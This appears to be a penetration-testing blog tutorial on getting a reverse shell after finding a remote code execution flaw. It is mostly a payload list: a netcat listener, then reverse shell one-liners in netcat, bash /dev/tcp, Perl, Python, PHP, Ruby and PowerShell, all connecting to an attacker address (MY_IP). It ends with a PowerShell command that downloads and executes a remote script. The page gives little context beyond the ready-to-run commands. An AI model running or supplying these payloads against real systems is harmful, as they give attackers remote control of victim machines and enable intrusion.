Reverse Shell one liner – how to do it

If during a penetration test you discover an RCE (Remote Code Execution) vulnerability most likely what you need is to run a Reverse Shell to gain more control over the victim machine.

An RCE is a vulnerability that allows you to execute commands on the victim. And this is why if I activate a listener on my system I will be able to execute a command on the exploited machine whose purpose is to make it connect to my listener obtaining a shell.

First you need to activate a listener on your machine typically using netcat:

Netcat listener

# nc -lnvp 1234

-l means "listen mode"
-n prevent "DNS lookup"
-v means "verbose mode"
-p means "the listened port" (in this case is port 1234)

Then, when your listener is running, you can execute RCE on victim machine to connect to listener.

There are various methods for doing this. The most used methods are those based on linux systems and are the following:

netcat
nc -e /bin/sh MY_IP 1234

or

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f

or

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f
bash
bash -i >& /dev/tcp/MY_IP/1234 0>&1

or

0<&196;exec 196<>/dev/tcp/MY_IP/1234; sh <&196 >&196 2>&196
PERL
perl -e 'use Socket;$i="MY_IP";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python

IPv4

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

or

IPv6

python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
PHP
php -r '$sock=fsockopen("MY_IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

or

php -r '$sock=fsockopen("MY_IP",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

or

php -r '$sock=fsockopen("MY_IP",1234);`/bin/sh -i <&3 >&3 2>&3`;' 

or

php -r '$sock=fsockopen("MY_IP",1234);system("/bin/sh -i <&3 >&3 2>&3");'

or

php -r '$sock=fsockopen("MY_IP",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'

or

php -r '$sock=fsockopen("MY_IP",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("MY_IP",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Windows victim machine

If victim is Windows machine you can use Powershell (if this is installed) to connect to listener:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('MY_IP',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

instead if you have a “ps1” script to do reverse shell in your machine you can run a simple web server on port 8000 using, for example, python3:

python3 -m http.server 8000

so, to connect to netcat listener, run powershell in victim to download and execute “ps1” script, as follow:

powershell "IEX(New-Object Net.WebClient).downloadString('http://MY_IP:8000/scrtipt.ps1')"
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments